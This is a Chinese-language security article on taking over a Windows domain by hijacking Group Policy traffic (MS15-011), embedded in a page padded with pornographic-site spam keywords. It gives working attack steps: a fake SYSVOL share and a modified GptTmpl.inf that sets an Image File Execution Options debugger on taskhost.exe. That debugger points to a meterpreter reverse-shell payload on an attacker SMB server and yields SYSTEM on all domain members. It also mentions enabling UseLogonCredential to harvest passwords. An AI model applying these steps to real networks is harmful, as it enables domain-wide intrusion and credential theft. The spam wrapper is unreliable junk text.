精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

域滲透之流量劫持

安全 黑客攻防
windows Domain 中文翻譯為域,域既是 Windows 網絡操作系統的邏輯組織單元,也是Internet的邏輯組織單元。它是由所有的用戶計算機,打印機,用戶賬戶和其他的安全主體組成,被域控制器管理。

說在前面

windows Domain 中文翻譯為域,域既是 Windows 網絡操作系統的邏輯組織單元,也是Internet的邏輯組織單元。它是由所有的用戶計算機,打印機,用戶賬戶和其他的安全主體組成,被域控制器管理。

域是微軟提供給企業的一個局域網管理措施,使得信息技術人員能高效的管理和維護局域網中所有的主機和用戶。域位于每一個企業最核心的位置,在域上運行著大量的企業核心應用,如郵件系統,協同辦公系統,文件共享系統等。

在網絡滲透攻擊中,攻擊者如果獲取了域的權限,那么攻擊者就有可能獲取公司的機密,控制公司的一切。所以域安全是企業安全最為核心的一個環節,并且微軟對域本身也在進行不斷的安全加固。

NSA泄漏的文檔和工具讓人們明白了網絡的底層設備是多么的不堪一擊,但是部分運維人員和安全人員仍然抱有幻想,只要養成正確的計算機使用習慣,不安全的底層網絡很難威脅到域的安全,但是事實往往不是這樣,Windows域本身十分脆弱,尤其是在不安全的網絡環境中,因為域是基于信任底層網絡進行設計和建造的。

本文將利用另外一種方法,完成從底層網絡入侵windows域。

原理分析

當底層網絡被攻陷,攻擊者就能輕易的劫持流量,偽造網絡節點。而劫持流量攻擊最基本的設計思路就是建立在一個假設之上,如果劫持了某個設備,能達到什么目的。

如果劫持了域控,能達到什么目的?

基于這個假設,進行了一系列測試,拿出其中一個測試與大家共同研究。

在微軟的官網上有如下描述:

組策略是在基于 Active Directory 域服務 (AD DS) 的網絡上訪問和配置計算機及用戶設置的最輕松易行的方式。如果您的企業未在使用組策略,那么將會錯失降低成本、控制配置、使用戶保持卓有成效和愉悅的心情以及增強安全性的大好機會。可以將使用組策略進行配置視為“一舉多得”。

域控通過組策略完成對域內機器的進行配置的一種方式,windows域機器每間隔一段時間就會向域控制器請求更新組策略,以保證自身使用著最新的域策略。更新的過程是,域成員機器每間隔 90min+random()*30min ,向域控請求策略版本號,這個版本號存在于域控的gpt.ini文件中,位于

  1. \\domian_name\sysvol\domain_name\Policies 

文件夾中,文件內容為:

  1. [General] 
  2. Version = 1 

這個版本號如果等于自身版本號,那么系統就認為自身組策略是最新版本。然后重置計時器,等待下一個間隔去請求更新。

詳細數據包請求過程如下圖:

如果自身版本號小于返回的版本號,那么系統認為自身組策略以過時,就繼續請求registry.pol 和GptTmpl.ini文件,詳細數據包請求過程如下圖:

而GptTmpl.inf文件,是一個模版文件,允許遠程修改域成員的注冊表。

如果劫持并且修改了GptTmpl.inf文件,就可以隨意修改請求該文件域成員的注冊表。利用劫持該文件入侵域的一種方式就是修改注冊表給域機器添加啟動項,等到機器重啟時,就可以運行指定文件或者腳本。

但是面臨著一個問題,必須等到該機器重新啟動。該機器可能啟動周期很長,攻擊者的啟動腳本或攻擊payload存儲的位置就必須持續保持,很不方便。之前CoreSecurity的測試POC時修改AppInit_DLL注冊表鍵值,但是這個鍵值已經不啟用很多年了。所以需要一個簡便高效的方式。再經過多種利用測試之后,終于找到一種非常好用的方式,一個神奇的注冊表鍵值:

  1. [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution optin] 

通過修改這個鍵值,可以給任一windows程序添加一個debugger調試器。例如可以給cmd.exe添加一個調試器debugger.exe,這樣你在啟動cmd.exe 的時候,實際運行的為:

  1. c:\debugger.exe cmd.exe 

通過這種方式,可以給IE,Chrome或者其他什么用戶可能會運行的程序添加一個調試器,這種方式明顯會比等待用戶重啟要迅速的多。

即使是在用戶權限受限制的情況下,依然可以通過組策略劫持的方式來對該機器的注冊表進行修改。但是在劫持完成之后,必須對注冊表進行清理,因為該調試程序不可能長久存在,那么之后用戶可能無法啟動該程序。并且修改鍵值需要管理員權限。

為了避免猜錯用戶使用的程序和較長的等待時間,經過多次測試找到了一個更好的解決辦法。系統在更新組策略之后,會用系統權限創建一個新的進程 taskhost.exe ,即使該用戶處于一個受限制的狀態。所以給taskhost.exe程序創建一個調試器,這樣就能在系統更新完粗策略后立刻獲取一個system權限的shell。不需要漫長的等待,不需要重啟,不需要用戶的任何操作,一切都是靜默中完成。

當然,這種劫持組策略執行命令的方式很早的時候就報告給了Microsoft,并且在2015年2月10日就發布安全公告 MS15-011并提供了補丁KB3000483。微軟決定在用戶端修復這個漏洞,強制使用“SMB Signing”。

但是,雖然這個漏洞在一年多前就已經發布安全公告,并且提供了相關補丁,但是這個補丁是默認不啟用的。

在微軟的官方公告中有這樣一段話:

This security update requires the following steps to be performed in order to protect against the vulnerability described in the bulletin (MS15-011). To enable this functionality, a system administrator must apply the following Group Policy settings in addition to installing security update 3000483.

其含義是:

系統管理員必須手動配置組策略,啟用“UNC Hardened Access”來避免MS15-011漏洞所帶來的安全風險。詳細的配置策略在微軟的官方網站,簡單總結成了12個步驟,網頁鏈接如下:

https://support.microsoft.com/en-us/kb/3000483

微軟認為這是一個漏洞,并且提供了相關的補丁。但是這個補丁并不是默認啟用,必須管理員手動配置12個步驟才能啟用。

所以該漏洞大多數環境中依然可以被當作0DAY來使用。

測試

實驗測試步驟如下:

1. 準備存放payload的SMB服務器和相應的payload

在該測試中,在攻擊者機器上啟用了SMB共享,創建一個映射為SYSVOL的目錄,命令如下:

  1. net share sysvol=C:\Users\TEST\Desktop\sysvol 

或者直接使用界面開啟共享,效果一樣。在文件夾中創建樹形結構,因為域機器在請求更新的時候只會請求固定位置的文件。文件結構如下:

  1. ─Domain_Name  
  2. └─Policies  
  3.     └─{31B2F340-016D-11D2-945F-00C04FB984F9} 
  4.              │  gpt.ini 
  5.              │ 
  6.              └─Machine 
  7.                  └─Microsoft 
  8.                      └─Windows NT 
  9.                          └─SecEdit 
  10.                                  GptTmpl.inf 

然后開啟整個文件夾的匿名共享,允許任何人訪問。

準備payload程序,本測試準備的是meterpreter_resver_tcp.exe,重命名為debugger.exe。

因為劫持方式不一樣,如果選擇直接修改數據包內容或者重新回包,可以不用創建樹形結構目錄,但是SMB的匿名共享文件夾是需要的,用來存放payload。

2. 劫持中需要修改的數據

首先修改Gpt.ini文件,將其中的版本號改為一個較大數字,方便起見改為1000,如下:

  1. [General]  
  2. Version=1000 

然后修改策略文件GptTmpl.ini,文件原內容如下:

  1. [Unicode] 
  2. Unicode=yes 
  3. [System Access] 
  4. MinimumPasswordAge = 1 
  5. MaximumPasswordAge = 42 
  6. MinimumPasswordLength = 7 
  7. PasswordComplexity = 1 
  8. PasswordHistorySize = 24 
  9. LockoutBadCount = 0 
  10. RequireLogonToChangePassword = 0 
  11. ForceLogoffWhenHourExpire = 0 
  12. ClearTextPassword = 0 
  13. LSAAnonymousNameLookup = 0 
  14. [Kerberos Policy] 
  15. MaxTicketAge = 10 
  16. MaxRenewAge = 7 
  17. MaxServiceAge = 600 
  18. MaxClockSkew = 5 
  19. TicketValidateClient = 1 
  20. [Registry Values
  21. MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1 
  22. [Version] 
  23. signature="$CHICAGO$" 
  24. Revision=1 

然后按照設計進行相應的修改,簡便起見,只添加修改注冊表項,修改后的文件內容如下:

  1. [Registry Values
  2. MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,\\evil_SMB_server\sysvol\admin.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\muma_test.exe 
  3. [Version] 
  4. signature="$CHICAGO$" 
  5. Revision=1 

將“evil_SMB_server”替換成放置payload的服務器地址,將“debugger.exe”替換成payload文件。

3. 開始攻擊

劫持流量到attacker上。在這里劫持流量的方式多種多樣,LLMNR,,NBT-NS ,MDNS,ARP,bad_tunnel等等等什么都行,有一款很好用的軟件,叫做Responder github,但是本次試驗是專門針對路由器流量劫持定制的程序來完成所有操作。

首先,client會tree一下整個文件夾,然后請求Gpt.ini,對比版本號,然后繼續請求GptTmpl.ini文件,將文件中的注冊表模版應用到注冊表中。應用成功之后,下載并以debugger.exe作為調試器啟動taskhost.exe程序, 然后稍等幾秒:

done

獲取了一臺機器的最高控制權限。

最多等待120min,就可以獲取到整個域機器的最高權限。除了域控制器,因為域控制器不會請求更新組策略。到那時如果域中有多個域控制器,它們之間會請求更新組策略,同樣可以被劫持。

除了域控外的所有設備都獲取了控制權限,已經基本可以在域中暢行無阻了。

針對域控,只能使用通過組策略創建替換登錄腳本,添加啟動項等方法中的一種。再或者,通過組策略添加登錄腳本,修改注冊表UseLogonCredential的鍵值,等機器完成重啟就能批量抓取用戶密碼,因為域管理員不可能只在域控上登錄。

或者使用其他的更好的方法 ,如有好的思路,請私信我,可以共同討論測試。

這樣就獲取到了整個域的控制權限。

總結

底層網絡設備很危險,并且底層網絡能給上層應用和服務帶來難以想象的影響。只是現在的安全圈子沒有深刻認識到。

責任編輯:武曉燕 來源: 安全客
相關推薦

2017-01-23 10:10:09

2014-12-31 15:05:11

Android流量監控

2016-03-16 09:47:55

2021-03-09 07:38:15

Percona Xtr流量控制運維

2016-03-22 10:14:25

域滲透滲透測試域控權限

2014-06-09 17:07:44

2012-12-25 13:45:37

2014-04-16 15:56:17

2015-10-27 11:11:46

2020-09-28 10:03:36

滲透

2019-03-29 09:39:24

域滲透DNSWindows

2022-10-11 17:51:49

分庫分表數據庫

2021-03-02 09:41:52

Android App攻擊流量

2017-03-27 16:08:58

2021-10-11 10:39:13

內網信息收集

2021-03-29 12:01:51

流量劫持瀏覽器漏洞

2014-09-12 18:18:02

tcpudtUDP

2015-04-03 09:35:57

2020-02-21 08:00:00

網頁廣告診斷

2014-06-27 09:25:24

點贊
收藏

51CTO技術棧公眾號

视频一区 中文字幕| 精品午夜一区二区三区在线观看| 国产精品美女久久福利网站| 国产精品视频中文字幕91| 国产主播av在线| 日韩成人在线观看视频| 亚洲综合丝袜美腿| 亚洲综合日韩在线| 国产无遮挡又黄又爽又色| 风间由美性色一区二区三区四区| 精品日本高清在线播放| 日韩亚洲视频在线| 亚洲va天堂va欧美ⅴa在线| 先锋影音久久久| 久久深夜福利免费观看| 日韩精品一区国产麻豆| 色欲色香天天天综合网www| 懂色av一区二区三区四区| 久久先锋资源| 欧美国产高跟鞋裸体秀xxxhd| 亚洲精品第二页| 日韩欧美精品一区二区三区| 日本一区二区三区dvd视频在线| www.成人三级视频| 在线观看色网站| 中文日韩在线| 国产a久久精品一区二区三区| 中文幕一区二区三区久久蜜桃| 国产精品成人国产乱一区| 豆国产97在线 | 亚洲| 神马电影久久| 日韩女同互慰一区二区| 欧美 日韩 国产在线观看| 日韩欧美小视频| 国产99精品视频| 国产成人精品日本亚洲| 日日骚一区二区三区| 欧美日韩一本| 欧美一级日韩一级| 久草热视频在线观看| 日本不卡不卡| 91性感美女视频| 国产日韩欧美在线看| 日本一级一片免费视频| 欧一区二区三区| 激情av一区二区| 欧美高清性xxxxhd| 亚洲综合免费视频| 欧美成人久久| 亚洲午夜精品久久久久久久久久久久| 波多野结衣加勒比| 亚洲2区在线| 337p亚洲精品色噜噜| 妺妺窝人体色www在线小说| 麻豆免费在线视频| 国产女主播在线一区二区| 91在线观看免费| 亚洲视频在线观看一区二区| 久久男女视频| 午夜欧美大片免费观看| 青青草在线观看视频| 欧美先锋资源| 亚洲性av网站| 国产精品无码久久久久一区二区| 狠狠久久伊人| 国产综合久久久| av亚洲精华国产精华精| 51国产成人精品午夜福中文下载| 中文在线免费看视频| 久久精品亚洲一区二区| 欧美亚洲国产精品| 黄色片在线观看网站| 欧美国产小视频| 国产视频在线观看一区二区| 国产女人18毛片水真多18| 日韩中文字幕在线一区| 欧美一区日本一区韩国一区| 一级黄色片在线免费观看| 福利一区二区三区视频在线观看| 欧美性大战xxxxx久久久| 老司机午夜av| 电影久久久久久| 色婷婷av一区二区三区之一色屋| 91视频 -- 69xx| 综合毛片免费视频| 在线一区二区三区四区五区| 国产天堂在线播放| 日韩和的一区二在线| 色噜噜久久综合| 成人午夜激情av| 美女网站视频一区| 91精品国产一区二区三区 | 91无套直看片红桃| 免费成人在线视频观看| 国产91对白在线播放| 国产福利久久久| 国产亚洲综合精品| 国产精品中文字幕在线| 国产一二三四在线视频| 国产少妇在线观看| 欧美日韩精品免费观看视频完整| 欧美风情在线观看| 国产成人无码精品久在线观看 | 婷婷四房综合激情五月| 少妇激情av一区二区| 91麻豆视频网站| 亚洲精品在线免费看| 三级视频在线| 久久色.com| 性生活免费观看视频| 久久亚洲导航| 亚洲一区在线播放| 可以免费在线看黄的网站| 精品一区二区三区免费看| 亚洲第一色中文字幕| 男人天堂资源网| 欧美二区不卡| 国产精品福利无圣光在线一区| 特级做a爱片免费69| 秋霞影院一区二区| 国产精品二区在线| 亚洲 国产 欧美 日韩| 中文av一区二区| 青青草成人免费在线视频| sm久久捆绑调教精品一区| 黄色成人免费网| 亚洲欧洲日韩女同| 鲁一鲁一鲁一鲁一澡| 全球最大av网站久久| 日韩精品一区二| 小早川怜子久久精品中文字幕| 国产精品99一区二区三区| 欧美有码在线观看| 国产精品视频在线观看免费 | 精品国产31久久久久久| www.精品在线| 亚洲精品国产setv| 欧美疯狂做受xxxx高潮| 亚洲视频在线观看免费视频| 久久亚洲综合色一区二区三区| 中文字幕在线亚洲三区| av资源在线| 欧美大胆一级视频| 免费一级suv好看的国产网站| 国产精品入口66mio| 草莓视频一区| 久草中文在线| 欧美日韩一区高清| a级大片免费看| 欧美色爱综合| 日韩免费精品视频| 天堂成人在线观看| 亚洲一区二区在线免费看| 亚洲免费av一区二区三区| 欧美a大片欧美片| 九九精品在线视频| 91福利在线观看视频| 亚洲国产精品二十页| 黄色一级在线视频| 亚洲综合网站| 久久精品视频亚洲| 在线观看色网站| 国产精品美女一区二区在线观看| 日韩精品视频一区二区在线观看| 免费av手机在线观看| 在线观看三级视频| 91精品国产综合久久久久久漫画| 黄色av片三级三级三级免费看| 亚洲伦伦在线| 国产男女猛烈无遮挡91| 欧洲毛片在线| 在线免费观看一区| 国产真实乱人偷精品| 在线欧美不卡| 99久久伊人精品影院| 欧美videos另类精品| 精品美女被调教视频大全网站| 国产人与禽zoz0性伦| 久久99久久99精品免视看婷婷| 亚洲欧洲国产日韩精品| 欧美v亚洲v综合v国产v仙踪林| 最新国产精品拍自在线播放| 91丨九色丨丰满| 最新国产成人在线观看| 日韩av福利在线观看| 亚洲免费二区| 国产精品我不卡| 天堂av中文在线观看| 亚洲欧美制服综合另类| 中文字幕一区二区三区四区欧美| 国产欧美综合在线观看第十页| 午夜国产一区二区三区| 国产精品久久观看| 成人自拍视频网站| 蜜臀精品一区二区| 都市激情亚洲一区| 日韩精品福利网站| 波多野结衣激情视频| 日韩美女精品在线| 中文字幕免费高清视频| 在线综合欧美| 日韩欧美亚洲日产国产| 亚洲图片小说区| 久久夜色精品国产| 亚洲天堂五月天| 一区二区三区四区精品在线视频| 精品国产人妻一区二区三区| 青青青爽久久午夜综合久久午夜| 99热都是精品| 欧美国产中文高清| 青青草原成人在线视频| 国产一区二区影视| 草草视频在线播放| 天天超碰亚洲| 五月天激情小说综合| 日本黄色网址大全| 精品一区二区三区香蕉蜜桃 | 97免费公开视频| 亚洲综合国产| 一区二区视频国产| 欧美日韩精品免费观看视欧美高清免费大片| 日韩视频一区在线| 深夜福利在线视频| 日韩一区二区电影| 日韩精品一区二区亚洲av观看| 亚洲黄网站在线观看| av在线网站观看| 成人免费视频播放| 视频免费1区二区三区| 国产精品普通话对白| 久久久天堂国产精品| 亚州综合一区| 91午夜理伦私人影院| heyzo在线欧美播放| 亚洲片在线观看| 欧美一级特黄aaaaaa大片在线观看 | 福利一区二区免费视频| 欧美成人女星排行榜| 台湾佬中文在线| 亚洲天堂免费看| 亚洲AV无码成人精品区明星换面| 国产一区二区91| 日韩欧美在线播放视频| 欧美日韩视频一区二区三区| 欧美日韩精品免费观看| 国产欧美啪啪| 国产精品9999久久久久仙踪林| 亚洲成人毛片| 国产精品91久久久| 小草在线视频免费播放| 欧美激情三级免费| 国产成人高清精品| 中文字幕一区二区精品| 青青视频在线观| 亚洲精品国产精品久久清纯直播| 亚洲黄色小说网址| 91精品国产综合久久小美女| 中文字幕无码乱码人妻日韩精品| 色偷偷88欧美精品久久久| 青青草成人免费| 日韩一区在线免费观看| 潮喷失禁大喷水aⅴ无码| 不卡视频在线观看| 亚洲天堂2024| www.日韩av| 久久久久亚洲AV成人无码国产| 日韩电影在线观看电影| 国产人妻人伦精品| 亚洲国产精品第一区二区| 免费人成在线观看视频播放| 国内视频精品| 成人免费视频91| 国产偷自视频区视频一区二区| 黄色高清视频网站| 久久久久久免费视频| 免费观看黄色的网站| 日韩欧美视频| 欧美爱爱视频网站| 欧美国产综合| 男人天堂av片| 欧美精品成人| 国产一区二区视频播放| 一本不卡影院| 亚洲狼人综合干| 精品在线一区二区| 人妻精品久久久久中文字幕69| 高清av一区二区| 国产老熟女伦老熟妇露脸| 福利视频网站一区二区三区| 插我舔内射18免费视频| 久久久国产精品午夜一区ai换脸| 中文字幕久精品免| 亚洲乱亚洲乱妇| 日韩中文字幕精品| 在线中文字幕第一页| 66m—66摸成人免费视频| 澳门av一区二区三区| 国产精品第8页| 91精品网站在线观看| 国产精品国产一区二区| 日韩电影不卡一区| 亚洲一二区在线| 激情综合视频| 国产女大学生av| 韩国av一区二区三区在线观看| 午夜激情视频网| 久久综合久久综合亚洲| 国产男女猛烈无遮挡在线喷水| 亚洲日本va午夜在线影院| 日本一区二区欧美| 欧美日免费三级在线| 精品国产伦一区二区三区| 精品成人免费观看| 艳母动漫在线看| 日韩中文字幕国产| 忘忧草在线日韩www影院| 成人在线国产精品| 亚洲另类春色校园小说| 一级日韩一区在线观看| av成人毛片| 天天av天天操| www.亚洲激情.com| 人妻久久一区二区| 激情av一区二区| 精品国产免费无码久久久| 亚洲天堂免费在线| 波多一区二区| 国产999精品久久久| 911亚洲精品| 色婷婷精品国产一区二区三区| 亚洲国产日本| 99精品999| 91美女片黄在线观看| 午夜免费激情视频| 精品视频资源站| 毛片在线免费| 国产91ⅴ在线精品免费观看| 日韩成人视屏| 中国人体摄影一区二区三区| 欧美精品一级| www日本在线观看| 亚洲国产激情av| 久久久免费高清视频| 亚洲第一页中文字幕| 国产美女av在线| 国产日韩精品综合网站| 欧美精选一区二区三区| 粗暴91大变态调教| 91丨九色丨蝌蚪丨老版| 69夜色精品国产69乱| 欧美色区777第一页| 噜噜噜噜噜在线视频| 久久九九久精品国产免费直播| 欧美视频在线观看视频| 国产在线不卡一区| 国精产品一区一区三区免费视频 | 图片区小说区区亚洲五月| 亚洲午夜激情在线| 午夜免费精品视频| 久久蜜桃av一区精品变态类天堂 | 国产91富婆露脸刺激对白| 四虎永久免费在线| 欧美亚洲免费在线一区| 久久久pmvav| 欧美成人精品h版在线观看| 欧美亚洲福利| 久久riav二区三区| 丝袜诱惑制服诱惑色一区在线观看| 成人精品在线观看视频| 精品久久中文字幕| 亚洲日本中文字幕在线| 欧洲成人免费视频| 日韩伦理一区二区三区| 日本熟妇人妻中出| 国产精品丝袜在线| 国产精品视频第一页| 欧美国产一区二区三区| 精品国产乱子伦一区二区| 妞干网这里只有精品| 麻豆精品在线播放| 久久精品这里只有精品| 欧美精品一区二| 竹内纱里奈兽皇系列在线观看| 激情伦成人综合小说| 亚洲欧美日韩综合国产aⅴ| 魔女鞋交玉足榨精调教| 色综合天天综合| 亚洲天天影视| 91手机在线播放| 韩国一区二区三区在线观看| 人妻体体内射精一区二区| 亚洲精品免费播放| 午夜18视频在线观看| 国产精品女人久久久久久| 午夜久久一区| 欧美 变态 另类 人妖| 91国产免费看| caoporn免费在线| 国产亚洲一区二区三区在线播放| 国产精品xvideos88|